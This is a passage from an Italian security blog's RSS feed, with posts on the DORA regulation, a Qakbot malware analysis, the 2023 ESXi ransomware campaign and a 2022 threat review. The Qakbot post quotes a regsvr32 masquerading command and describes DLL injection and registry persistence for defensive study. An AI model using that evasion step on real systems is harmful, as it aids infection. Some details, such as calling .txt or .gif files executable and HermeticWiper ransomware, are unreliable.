personale idoneo alla raccolta delle informazioni relative a minacce e vulnerabilità, il riesamino di incidenti passati con l’obiettivo di condividere gli insegnamenti, la definizione di piani di comunicazione verso gli stakeholder ed infine la definizione di norme tecniche e regolamentazione.&lt;/p&gt;

&lt;h3 id=&#34;test-di-resilienza&#34;&gt;Test di resilienza&lt;/h3&gt;

&lt;p&gt;L’attuazione di &lt;strong&gt;test di resilienza&lt;/strong&gt;, così come elencato nel quarto capitolo del regolamento, è volto ad &lt;strong&gt;accrescere la consapevolezza&lt;/strong&gt; da parte delle autorità di vigilanza sui rischi informatici e sugli incidenti cui sono esposte le entità finanziarie.
In particolare, attraverso una serie di test periodici sarà possibile &lt;strong&gt;identificare i punti deboli, le carenze o le lacune&lt;/strong&gt;, al fine di attuare tempestivamente le misure correttive con un’applicazione proporzionata alle proprie dimensioni ed al proprio profilo di rischio.&lt;/p&gt;

&lt;h3 id=&#34;rischi-relativi-alle-terze-parti&#34;&gt;Rischi relativi alle terze parti&lt;/h3&gt;

&lt;p&gt;Nel quinto capitolo vengono elencati i &lt;strong&gt;poteri di sorveglianza&lt;/strong&gt; sui rischi che sono conferiti alle autorità di vigilanza finanziaria. La necessità di &lt;strong&gt;indirizzare i poteri di sorveglianza&lt;/strong&gt; è dovuta alla dipendenza delle entità finanziarie, come di tutte le aziende, da fornitori terzi di servizi. Gli aspetti contrattuali chiave saranno armonizzati per garantire che &lt;strong&gt;le società finanziarie monitorino i rischi di terzi&lt;/strong&gt;.
Inoltre, i fornitori terzi di servizi ITC critici saranno sottoposti a un quadro di sorveglianza dell’Unione. Per ciascun fornitore terzo sarà poi definita un’autorità di sorveglianza capofila alla quale sono conferiti poteri idonei a garantire l’adeguato monitoraggio dei fornitori di servizi tecnologici.&lt;/p&gt;

&lt;h3 id=&#34;condivisione-delle-informazioni&#34;&gt;Condivisione delle informazioni&lt;/h3&gt;

&lt;p&gt;In assenza di orientamenti a livello europeo, alcuni fattori hanno nel tempo ostacolato la condivisione di informazioni preziose e utili per arginare i rischi informatici.
Nel contesto attuale, la crescente complessità e sofisticatezza dei rischi informatici, così come i dubbi degli operatori finanziari sul tipo di informazioni condivisibili sono stati alcuni tra i principali motivi che hanno spinto la legislazione europea ad &lt;strong&gt;estendere il perimetro dell’intervento&lt;/strong&gt; normativo realizzato con il Regolamento DORA &lt;strong&gt;anche agli ambiti della comunicazione e della condivisione di informazioni&lt;/strong&gt; sui rischi e sulle minacce informatiche.
Tramite l’istituzione di accordi tra le entità finanziarie sarà possibile uno &lt;strong&gt;scambio di informazioni e di dati più lineare e trasparente&lt;/strong&gt;.&lt;/p&gt;

&lt;h2 id=&#34;a-chi-si-applica&#34;&gt;A chi si applica&lt;/h2&gt;

&lt;p&gt;Il presente regolamento &lt;strong&gt;si applica alle seguenti entità&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Enti creditizi;&lt;/li&gt;
&lt;li&gt;Istituti di pagamento, compresi gli istituti di pagamento esentati a norma della direttiva (UE) &lt;sup&gt;2015&lt;/sup&gt;&amp;frasl;&lt;sub&gt;2366&lt;/sub&gt;;&lt;/li&gt;
&lt;li&gt;Prestatori di servizi di informazione sui conti;&lt;/li&gt;
&lt;li&gt;Istituti di moneta elettronica, compresi gli istituti di moneta elettronica esentati a norma della direttiva 2009/110/CE;&lt;/li&gt;
&lt;li&gt;Imprese di investimento;&lt;/li&gt;
&lt;li&gt;Fornitori di servizi per le cripto-attività autorizzati a norma del regolamento del Parlamento europeo e del Consiglio concernente i mercati delle cripto-attività e recante modifica dei regolamenti (UE) n. &lt;sup&gt;1093&lt;/sup&gt;&amp;frasl;&lt;sub&gt;2010&lt;/sub&gt; e (UE) n. &lt;sup&gt;1095&lt;/sup&gt;&amp;frasl;&lt;sub&gt;2010&lt;/sub&gt; e delle direttive 2013/36/UE e (UE) &lt;sup&gt;2019&lt;/sup&gt;&amp;frasl;&lt;sub&gt;1937&lt;/sub&gt; (regolamento sui mercati delle cripto-attività) ed emittenti di token collegati ad attività;&lt;/li&gt;
&lt;li&gt;Depositari centrali di titoli;&lt;/li&gt;
&lt;li&gt;Controparti centrali;&lt;/li&gt;
&lt;li&gt;Sedi di negoziazione;&lt;/li&gt;
&lt;li&gt;Repertori di dati sulle negoziazioni;&lt;/li&gt;
&lt;li&gt;Gestori di fondi di investimento alternativi;&lt;/li&gt;
&lt;li&gt;Società di gestione;&lt;/li&gt;
&lt;li&gt;Fornitori di servizi di comunicazione dati;&lt;/li&gt;
&lt;li&gt;Imprese di assicurazione e di riassicurazione;&lt;/li&gt;
&lt;li&gt;Intermediari assicurativi, intermediari riassicurativi e intermediari assicurativi a titolo accessorio;&lt;/li&gt;
&lt;li&gt;Enti pensionistici aziendali o professionali;&lt;/li&gt;
&lt;li&gt;Agenzie di rating del credito;&lt;/li&gt;
&lt;li&gt;Amministratori di indici di riferimento critici;&lt;/li&gt;
&lt;li&gt;Fornitori di servizi di crowdfunding;&lt;/li&gt;
&lt;li&gt;Repertori di dati sulle cartolarizzazioni;&lt;/li&gt;
&lt;li&gt;Fornitori terzi di servizi TIC.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2 id=&#34;quali-le-maggiori-conseguenze&#34;&gt;Quali le maggiori conseguenze&lt;/h2&gt;

&lt;p&gt;Il regolamento DORA rimanda al principio di proporzionalità (Art.4) e quindi rimette al &lt;strong&gt;singolo soggetto l’onere di valutare e dimostrare il livello dei propri requisiti&lt;/strong&gt; e come questi possano essere implementati.&lt;/p&gt;

&lt;p&gt;Le &lt;strong&gt;maggiori conseguenze&lt;/strong&gt; riguarderanno:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Gap analysis&lt;/strong&gt;: revisionare la propria struttura di governance interna e le misure di gestione del rischio e degli incidenti per valutare oltre che la consapevolezza aziendale, anche le strategie di risposta e di ripristino adeguate ai requisiti normativi.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Revisione dei meccanismi di reporting&lt;/strong&gt;: valutare la capacità dell’azienda in ambito di reportistica ed eventualmente implementare o adeguare le esistenti procedure di segnalazione degli incidenti sulla base dei nuovi requisiti.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Valutazione dei fornitori critici&lt;/strong&gt;: mappare i contratti con i fornitori terzi per valutare le criticità rispetto all’operatività del business; tramite la revisione delle pratiche sarà possibile un adeguamento strategico di contenimento del rischio.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I requisiti espressi da DORA non sono in contrasto con le altre normative ed, in primis, con lo stesso GDPR. &lt;strong&gt;Ogni&lt;/strong&gt; tipologia di &lt;strong&gt;azienda&lt;/strong&gt; si trova di fronte alla necessità di &lt;strong&gt;intraprendere un percorso di consolidamento e rafforzamento della propria struttura di difesa&lt;/strong&gt; e di tutta la catena dei fornitori. Esistono diverse peculiarità rispetto al campo normativo, al settore merceologico di appartenenza passando dal livello di riservatezza dei dati gestiti, ma dobbiamo essere consapevoli che &lt;strong&gt;il tema della sicurezza delle informazioni è centrale per la vita di ogni struttura aziendale&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;La &lt;strong&gt;documentazione originale&lt;/strong&gt; è scaricabile al seguente &lt;a href=&#34;https://www.consilium.europa.eu/it/press/press-releases/2022/11/28/digital-finance-council-adopts-digital-operational-resilience-act&#34;&gt;sito&lt;/a&gt;&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Analisi del malware Qakbot</title>
         <link>https://blog.cybergon.com/posts/analisi-del-malware-qakbot/</link>
         <pubDate>Tue, 07 Mar 2023 14:16:01 +0000</pubDate>
         <authors>
         
              
             <author>Marco Prosdocimi</author>
         
               
             <author>Ilaria Martinelli</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/analisi-del-malware-qakbot/</guid>
         <description>

&lt;p&gt;Torniamo all’articolo relativo al &lt;a href=&#34;https://blog.cybergon.com/posts/funzionamento-malware-qakbot/&#34;&gt;malware Qakbot&lt;/a&gt; per fare un approfondimento sul suo funzionamento.
L’attività relativa alle operazioni del malware QakBot, come già avevamo anticipato a dicembre, ha registrato un incremento.&lt;/p&gt;

&lt;p&gt;Abbiamo, quindi, studiato il malware attraverso &lt;strong&gt;un’analisi dettagliata per approfondire il tema e mostrare il suo funzionamento&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/qakbot/qakbot-cop.png&#34; alt=&#34;Qakbot Malware&#34; /&gt;&lt;/p&gt;

&lt;h2 id=&#34;funzionamento-del-malware&#34;&gt;Funzionamento del malware&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Il malware&lt;/strong&gt; in questione, attivo dal 2008, è una minaccia che in questi 15 anni di “vita” &lt;strong&gt;continua ad evolversi per cercare di eludere&lt;/strong&gt;, quanto più possibile, &lt;strong&gt;i controlli di rilevamento&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;In particolare, &lt;strong&gt;il malware viene veicolato tramite delle campagne phishing&lt;/strong&gt; che portano la vittima a scaricare degli allegati dannosi, in genere creati con modelli esistenti di Microsoft Office, come fatture o ordini di vendita.&lt;/p&gt;

&lt;p&gt;Gli attaccanti cercano di implementare tecniche di offuscamento tramite l’utilizzo di archivi ZIP.&lt;/p&gt;

&lt;p&gt;Di seguito si riporta un esempio di flusso di infezione di Qakbot.&lt;/p&gt;

&lt;p&gt;Il malware viene recapitato con una mail di phishing che contiene un archivio zip protetto da password e che a sua volta contiene un’immagine ISO, cioè un’estensione utilizzata generalmente per file immagine.&lt;/p&gt;

&lt;p&gt;Alcuni esempi di nome sono:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Details12.iso&lt;/li&gt;
&lt;li&gt;Contract_1.iso&lt;/li&gt;
&lt;li&gt;Cancellation#2 iso&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;L&amp;rsquo;ISO contiene un file LNK, collegamento rapido di Windows, che mostra un&amp;rsquo;icona familiare di una directory o di un documento che induce la vittima a fare doppio clic su di esso. Inoltre, è presente una cartella nascosta che contiene alcuni payload e la DLL (Dynamic Link Library) di Qakbot, una libreria contenente codice e dati utilizzabili da più di un programma contemporaneamente.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/qakbot/qakbot-1.png&#34; alt=&#34;Qakbot Malware Analysis&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Il file LNK funge da collegamento a cmd.exe che esegue uno script batch (.cmd) presente nella directory nascosta.
Nella stessa directory sono anche presenti quattro file (.txt, .cmd, .gif e .dat) e il file LNK che esegue il file .cmd in cui è contenuto il seguente codice:&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/qakbot/qakbot-2.png&#34; alt=&#34;Qakbot Malware Analysis-2&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Lo script batch ha due gruppi di comandi: &amp;ldquo;set&amp;rdquo; (righe 4-8) e &amp;ldquo;call&amp;rdquo; (riga 10). Il gruppo &amp;ldquo;set&amp;rdquo; crea cinque variabili di ambiente e il gruppo &amp;ldquo;call&amp;rdquo; esegue una riga di comando offuscata con tutte le variabili di ambiente.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Il malware utilizza una tecnica di mascheramento per evitare i rilevamenti&lt;/strong&gt; che consiste nel posizionare il file binario regsvr32.exe in una posizione diversa da quella standard, utilizzando replace.exe.&lt;/p&gt;

&lt;p&gt;replace C:\Windows\system32\regsvr32.exe C:\Users\Admin\AppData\Local\Temp /A&lt;/p&gt;

&lt;p&gt;Il parametro /A copia il nuovo file nella directory richiesta anziché spostare il file esistente.
%1 %2 %3 sono gli argomenti che risiedono nella riga di comando LNK. La loro concatenazione, che risulta in regsvr32.exe, verrà eseguita per caricare la DLL di Qakbot in un processo chiamato DLL Injection. La DLL di Qakbot in questo caso è il file &amp;ldquo;volleyed.dat&amp;rdquo;.&lt;/p&gt;

&lt;p&gt;Invece, &lt;strong&gt;nella tecnica sfruttata da Qakbot, che si chiama DLL Injection, si usa una tecnica di Code Injection&lt;/strong&gt; per eseguire del codice all’interno di un processo forzandolo a caricare una libreria DLL esterna.&lt;/p&gt;

&lt;p&gt;Essa viene solitamente eseguita scrivendo il percorso di una DLL nello spazio di memoria del processo target. Questa injection può essere eseguita con chiamate API native di Windows.
La DLL di Qakbot prende di mira un processo che verrà scelto da un elenco codificato in base alle soluzioni AV in esecuzione sul sistema compromesso, al fine di eluderle.&lt;/p&gt;

&lt;p&gt;Alcuni processi target sono:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;%SystemRoot%\SysWOW64\wermgr.exe (nelle ultime campagne il processo target era: %SystemRoot%\SysWOW64\explorer.exe)&lt;/li&gt;
&lt;li&gt;%SystemRoot%\SysWOW64\mobsync.exe&lt;/li&gt;
&lt;li&gt;%SystemRoot%\SysWOW64\msra.exe&lt;/li&gt;
&lt;li&gt;%SystemRoot%\SysWOW64\OneDriveSetup.exe&lt;/li&gt;
&lt;li&gt;%ProgramFiles(x86)%\Internet Explorer\iexplore.exe&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Dopo l&amp;rsquo;iniezione, Qakbot corrompe il file sul disco sovrascrivendolo, in modo da interferire con i tentativi di analisi forense.
A questo punto, &lt;strong&gt;il processo Qakbot iniettato esegue comandi di discovery usando processi legittimi di Windows&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Tramite i comandi di discovery si raccolgono informazioni sul sistema compromesso e si inviano le informazioni al server C2. Questa azione serve agli autori del malware per mappare il sistema e sfruttare possibili movimenti laterali.
Il meccanismo di persistenza, che qui non verrà approfondito, consiste nello scrivere una chiave di registro sotto (HKCU\Software\Microsoft\Windows\CurrentVersion\Run).&lt;/p&gt;

&lt;p&gt;Un’altra delle azioni spesso eseguite dai criminali tramite l’infezione di qakbot è portare all’esecuzione di Mimikatz o Cobalt Strike: la prima funzionalità consente ai criminali di scaricare password e hash NTLM dalla memoria, raccogliere ticket Kerberos ed eseguire un attacco chiamato &amp;ldquo;Pass the Hash&amp;rdquo;, per cui i criminali eseguono il movimento laterale e l&amp;rsquo;escalation dei privilegi.&lt;/p&gt;

&lt;p&gt;In conclusione, è stato osservato che &lt;strong&gt;l&amp;rsquo;attacco viene portato avanti direttamente dal criminale che procede ad eseguire un ransomware&lt;/strong&gt;, portando alle conseguenze che sono note a tutti.&lt;/p&gt;

&lt;h2 id=&#34;consigli-per-difendersi&#34;&gt;Consigli per difendersi&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Il malware Qakbot viene distribuito principalmente tramite campagne di phishing&lt;/strong&gt;, in cui si fa leva sulla disattenzione degli utenti per spingerli ad aprire gli allegati di posta elettronica. Un clic di troppo può quindi portare a conseguenze molto gravi che dipendono, anche, dal tipo di malware distribuito.
Nonostante nel mondo della sicurezza informatica non sia possibile impedire totalmente un’infezione, esistono comunque delle &lt;strong&gt;regole di difesa da mettere in pratica&lt;/strong&gt; contro questo tipo di minacce.&lt;/p&gt;

&lt;p&gt;In particolare:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;non scaricare gli allegati proveniente da mittenti sconosciuti;&lt;/li&gt;
&lt;li&gt;è bene prestare attenzione anche se il mittente è conosciuto nel momento in cui vengono condivise delle informazioni non richieste;&lt;/li&gt;
&lt;li&gt;non eseguire file eseguibili (.txt, .cmd, .gif e .dat) allegati alle email, a meno di non essere assolutamente certi della provenienza;&lt;/li&gt;
&lt;li&gt;non abilitare le macro all’interno dei prodotti Office;&lt;/li&gt;
&lt;li&gt;in caso di dubbio, contattare il mittente prima di aprire l’allegato per chiedere ulteriori informazioni.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;In caso di dubbi o se sei vittima di un attacco puoi scriverci a &lt;strong&gt;sos@cybergon.com&lt;/strong&gt;.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Attacco ai server VMware ESXi: cosa è successo</title>
         <link>https://blog.cybergon.com/posts/attacco-server-vmware-esxi/</link>
         <pubDate>Tue, 14 Feb 2023 10:16:00 +0000</pubDate>
         <authors>
         
              
             <author>Ilaria Martinelli</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/attacco-server-vmware-esxi/</guid>
         <description>

&lt;p&gt;Nella giornata di domenica 5 febbraio le testate giornalistiche, i telegiornali nazionali e le radio hanno parlato di un &lt;strong&gt;massiccio attacco informatico in tutto il mondo&lt;/strong&gt; che ha visto colpita anche la nostra Nazione.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Ma è davvero così?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Ripercorriamo insieme le tappe&lt;/strong&gt; e ricostruiamo cosa è successo.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/attacco-server-vmware-esxi/vmware-copertina.png&#34; alt=&#34;attacco-server-vmware-esxi&#34; /&gt;&lt;/p&gt;

&lt;h2 id=&#34;cosa-è-successo&#34;&gt;Cosa è successo&lt;/h2&gt;

&lt;p&gt;Venerdì 3 febbraio l’Agenzia per la Cybersicurezza Nazionale (ACN) ha segnalato, in una &lt;a href=&#34;https://www.csirt.gov.it/contenuti/rilevato-lo-sfruttamento-massivo-della-cve-202121974-in-vmware-esxi-al01-230204-csirt-ita&#34;&gt;comunicazione&lt;/a&gt; sul CSIRT italiano, di aver &lt;strong&gt;rilevato un “massiccio sfruttamento” attivo in rete della vulnerabilità CVE-2021-21974 presente nei prodotti VMware EXSi&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Sull’accaduto, sempre nella stessa giornata, il CERT-Francese aveva pubblicato un Security Advisory in cui evidenziava i dettagli dello sfruttamento.
Dalle analisi è emerso che la campagna era indirizzata anche verso soggetti nazionali.&lt;/p&gt;

&lt;p&gt;In particolare, ad oggi, &lt;strong&gt;risultano compromessi circa 2400 server totali, dei quali circa una ventina interessano l’Italia&lt;/strong&gt;.
Nella foto sottostante troviamo la mappatura dei server compromessi.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/attacco-server-vmware-esxi/VMware-3.JPG&#34; alt=&#34;attacco-server-vmware-esxi-worldwide&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Con un dettaglio anche alla situazione europea.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/attacco-server-vmware-esxi/VMware-4.JPG&#34; alt=&#34;attacco-server-vmware-esxi-europa&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Facendo riferimento all’Europa, sono state diverse le Nazioni prese di mira, ma gli attacchi non sono stati così consistenti come è stato riportato. Lo dimostra l’esempio dell’Italia che, come già accennato sopra, è stata interessata solo da circa 20 server compromessi.&lt;/p&gt;

&lt;h2 id=&#34;come-comportarsi&#34;&gt;Come comportarsi&lt;/h2&gt;

&lt;p&gt;Il primo aspetto da sottolineare riguarda il fatto che &lt;strong&gt;la vulnerabilità è del 2021 e la relativa patch è stata resa disponibile da Febbraio 2021&lt;/strong&gt;.
Quello che emerge con evidente criticità nell’analisi di questa situazione non è tanto lo sfruttamento della vulnerabilità da parte di una cyber gang, quanto più la mancata applicazione della patch di sicurezza anche dopo due anni dalla sua evidenza.&lt;/p&gt;

&lt;p&gt;Ormai da anni i cyber criminali utilizzano lo sfruttamento di vulnerabilità per infiltrarsi all’interno di infrastrutture, corrompere i dati e richiedere un riscatto, in cambio del recupero dei file. Sono anche anni che si ricevono notizie di sfruttamento di vulnerabilità zero-day, cioè vulnerabilità rilevate ma per la quale i produttori del software ancora non hanno creato una patch.&lt;/p&gt;

&lt;p&gt;Tuttavia il caso sopracitato non rispecchia la realtà attuale, poiché, come già detto in precedenza, la patch era stata rilasciata immediatamente dopo la scoperta della vulnerabilità stessa ed è ampiamente disponibile da un lungo periodo di tempo.
&lt;strong&gt;Il focus del problema&lt;/strong&gt;, dunque, deve necessariamente spostarsi sulla &lt;strong&gt;mancanza di processi che garantiscano una pronta applicazione delle patch&lt;/strong&gt; nell’esatto momento in cui queste diventano pubbliche, &lt;strong&gt;e non sullo sfruttamento delle vulnerabilità in sé&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Non è più possibile prendersi il lusso di pensare che una determinata realtà aziendale non possa essere presa di mira, semmai è il momento di realizzare il contrario. Il target dei gruppi criminali si è allargato non solo alle grandi aziende ma anche alle PMI, detentrici spesso di Proprietà Intellettuale di rilevanza per il business, ma non abbastanza strutturate a livello di sicurezza informatica: il bersaglio perfetto.&lt;/p&gt;

&lt;p&gt;Nella foto sottostante si riporta uno screen della chat del gruppo criminale Nevada che sta sfruttando la vulnerabilità di ESXi per la distribuzione del ransowmare.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/attacco-server-vmware-esxi/VMware-4.png&#34; alt=&#34;attacco-server-vmware-esxi&#34; /&gt;&lt;/p&gt;

&lt;h2 id=&#34;cosa-fare&#34;&gt;Cosa fare&lt;/h2&gt;

&lt;p&gt;La vulnerabilità, nota come CVE-2021-21974 e con uno score 8.8 sulla scala CVSS.V3, consiste in una remote command execution (RCE), ovvero una vulnerabilità che permette l’esecuzione di codice da remoto, che potrebbe essere sfruttata da un attaccante esterno alla rete aziendale e non autenticato, a causa di un problema presente nel servizio OpenSLP. La patch di sicurezza che risolve questo problema è stata distribuita da VMWare nel febbraio 2021, pertanto i sistemi aggiornati non sono soggetti a questa problmatica.&lt;/p&gt;

&lt;p&gt;Per eventuali dubbi, riportiamo il link alla pagina &lt;a href=&#34;https://www.vmware.com/security/advisories/VMSA-2021-0002.html?utm_source=hs_email&amp;amp;utm_medium=email&amp;amp;_hsenc=p2ANqtz-8J2txEWM0hrWHiLABKQBcQSRJHztyhXrM9YbH7b6_boOL6tY1CJ25NHhyy2yZwLJGlMT-x&#34;&gt;Security Advisories&lt;/a&gt; ufficiale dell’azienda e relativa alla vulnerabilità in questione.
Oltre ad applicare la patch di sicurezza, è possibile risolvere il problema su una versione di ESXi vulnerabile disattivando il servizio SLP.&lt;/p&gt;

&lt;h2 id=&#34;troppa-confusione&#34;&gt;Troppa confusione&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Ad acuire il senso di pericolo e agitazione&lt;/strong&gt;, negli stessi giorni sono stati registrati due eventi che hanno impattato gli utenti: &lt;strong&gt;il down della rete Tim e l’attacco informatico ad Acea&lt;/strong&gt;.
Nell’arco di poche ore, questi tre trend sono stati fatti convergere in un unico tema generale: attacco informatico a Tim e Acea.&lt;/p&gt;

&lt;p&gt;Si sottolinea che tale associazione di idee e la narrazione che ne è seguita sono totalmente false e disconnesse tra di loro.&lt;/p&gt;

&lt;p&gt;Tim ha registrato problemi alla connessione Internet, sia su rete fissa che mobile, su tutto il territorio nazionale. Nel pomeriggio un portavoce dell’azienda ha fatto sapere che il down era dovuto ad un problema di interconnessione internazionale e che erano in corso delle analisi per la risoluzione del problema. Dunque, nessuna conseguenza imputabile ad un attacco informatico in corso. Ne è la prova anche la risoluzione del problema: la stessa tempistica di ripristino, infatti, sarebbe pressoché impossibile se il danno fosse causato da un attacco informatico di livello critico.&lt;/p&gt;

&lt;p&gt;Il secondo tema ha riguardato l’attacco ad Acea, azienda che si occupa della gestione dei rifiuti, della produzione e distribuzione dell’energia elettrica e del servizio idrico per la città di Roma.
L’azienda è stata colpita da un attacco sferrato dalla cyber gang BlackBasta, che sembrava aver compromesso il funzionamento dei sistemi IT.
Onde evitare che le conseguenze dell’attacco si propagassero su altre risorse informatiche, si è provveduto allo spegnimento dei server potenzialmente raggiungibili dal malware.
Infine, l’azienda, grazie a delle soluzioni di backup adeguate, è stata in grado di tornare operativa senza perdita di dati né pagamento del riscatto.&lt;/p&gt;

&lt;p&gt;Come emerge da fonti ufficiali anche delle aziende coinvolte, quindi, non vi è una correlazione tra l’attacco informatico e la compromissione di VMware EXSi.&lt;/p&gt;

&lt;h2 id=&#34;in-conclusione&#34;&gt;In conclusione&lt;/h2&gt;

&lt;p&gt;Il weekend ha portato &lt;strong&gt;grande scompiglio principalmente a livello mediatico e sugli utenti finali&lt;/strong&gt;, poiché chi lavora nel mondo della cyber security è abituato a confrontarsi spesso con scenari di questo tipo. Come CybergON, ci sentiamo quindi di spingere per un &lt;strong&gt;ridimensionamento della percezione della portata dell’attacco&lt;/strong&gt;, che non sembra più grave o più sofisticato rispetto a quelli che vengono organizzati e condotti quotidianamente.&lt;/p&gt;

&lt;p&gt;Sebbene molti dispositivi siano stati crittografati, la campagna nel suo complesso non ha avuto successo: gli aggressori, infatti, non sono riusciti a crittografare i file flat in cui sono archiviati i dati del disco virtuale. Gli esperti hanno preparato uno &lt;a href=&#34;https://github.com/cisagov/ESXiArgs-Recover/blob/main/recover.sh&#34;&gt;script speciale&lt;/a&gt; per il ripristino dei server interessati, grazie ai quali dovrebbero esserci meno problemi per via dell’automatizzazione dell’intero processo CISA.
Si consiglia di eseguire prima un backup dei file per evitare di incorrere ad una ulteriore compromissione.&lt;/p&gt;

&lt;p&gt;Per finire, sottolineiamo l’importanza di questi momenti per accelerare la conoscenza della sicurezza informatica, in modo da evitare allarmismi e da mantenere un livello di protezione adeguato e aggiornato.&lt;/p&gt;

&lt;p&gt;Se desiderassi il nostro supporto, puoi mandarci una mail a &lt;strong&gt;sos@cybergon.com&lt;/strong&gt; con i dettagli della richiesta.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Almanacco 2022: eventi passati e nostre considerazioni</title>
         <link>https://blog.cybergon.com/posts/almanacco-2022/</link>
         <pubDate>Thu, 29 Dec 2022 14:16:01 +0000</pubDate>
         <authors>
         
              
             <author>Filadelfio Emanuele</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/almanacco-2022/</guid>
         <description>

&lt;p&gt;&lt;strong&gt;Fine anno tempo di bilanci&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Ormai, come nostra consuetudine, vogliamo ripercorrere insieme quanto accaduto nel 2022 da un punto di vista della sicurezza informatica, considerando i trend principali e le future evoluzioni.&lt;/p&gt;

&lt;p&gt;Se l’anno 2021 aveva visto un &lt;strong&gt;incremento degli attacchi in termini di quantità e gravità&lt;/strong&gt;, tale tendenza, positiva nei numeri ma negativa in termini etici, si è &lt;strong&gt;confermata ampiamente anche nel 2022&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Il numero degli attacchi è aumentato di circa l’8%&lt;/strong&gt; (Rapporto Clusit 2022), &lt;strong&gt;con una media di 191 attacchi al mese&lt;/strong&gt; (contro i 171 dell’anno scorso). Inoltre, gli attacchi hanno avuto una severity “alta” per metà del numero registrato, mentre quasi un terzo una gravità “critica”. Questo significa che più della maggior parte degli attacchi ha in qualche modo compromesso e severamente danneggiato la business continuity delle aziende, intaccando inevitabilmente profitti e costi da sostenere.&lt;/p&gt;

&lt;h2 id=&#34;instabilità-geopolitica-e-attacchi-informatici&#34;&gt;Instabilità geopolitica e attacchi informatici&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Un tema centrale del 2022 ha riguardato la guerra in Ucraina e le continue tensioni geopolitiche che sono poi sfociate in una vera e propria guerra cibernetica&lt;/strong&gt;, con continui attacchi informatici che hanno colpito non solo le due Nazioni protagoniste del conflitto ma anche Nazioni esterne, tra cui l’Italia.
&lt;strong&gt;Due minacce&lt;/strong&gt; in particolare hanno rubato la scena dal punto di vista della sicurezza informatica: &lt;strong&gt;i malware HermeticWiper e Cyclops Blink&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Approfittando della situazione di emergenza, diversi gruppi di cyber criminali hanno veicolato in particolare il malware é &lt;a href=&#34;https://blog.cybergon.com/posts/hermetic_wiper/&#34;&gt;HermeticWiper&lt;/a&gt; con l’obiettivo di sfruttare la situazione di tensione per colpire quante più organizzazioni possibili.&lt;/p&gt;

&lt;p&gt;E infatti, &lt;strong&gt;proprio nei mesi di marzo ed aprile, anche in Italia è stato registrato un sensibile incremento della distribuzione di attacchi veicolati da parte di organizzazioni criminali&lt;/strong&gt; che sfruttavano proprio il sopracitato ransomware per rubare i dati delle aziende colpite e monetizzarli tramite rivendita e richieste di riscatto.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/almanacco-2022/almanacco-14.png&#34; alt=&#34;Numero attacchi per mese in Italia&#34; /&gt;
Fonte: True Numb3rs - Numero attacchi per mese in Italia&lt;/p&gt;

&lt;h2 id=&#34;le-nostre-evidenze-sul-trend-2022&#34;&gt;Le nostre evidenze sul trend 2022&lt;/h2&gt;

&lt;p&gt;Sebbene i dati del paragrafo precedente mostrino che la situazione ha effettivamente subito un rallentamento durante la primavera, &lt;strong&gt;il numero complessivo degli attacchi è rimasto decisamente alto anche durante tutto l’anno&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Il trend riscontrato dalla nostra Business Unit ha messo in evidenza una stagionalità degli attacchi&lt;/strong&gt;. Nei mesi estivi, e in generale durante i periodi di festa, le attività dei cyber criminali aumentano, come dimostrano gli eventi critici di sicurezza rilevati dal nostro SOC e in evidenza nel grafico sottostante.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/almanacco-2022/almanacco-15.png&#34; alt=&#34;Eventi critici per mese&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Un altro dato interessante che vogliamo condividere riguarda &lt;strong&gt;l’orario di creazione degli eventi critici&lt;/strong&gt;. Anche in questo caso, vengono sfruttati orari come la pausa pranzo e la fine della giornata lavorativa per poter mettere a segno le attività illecite.&lt;/p&gt;

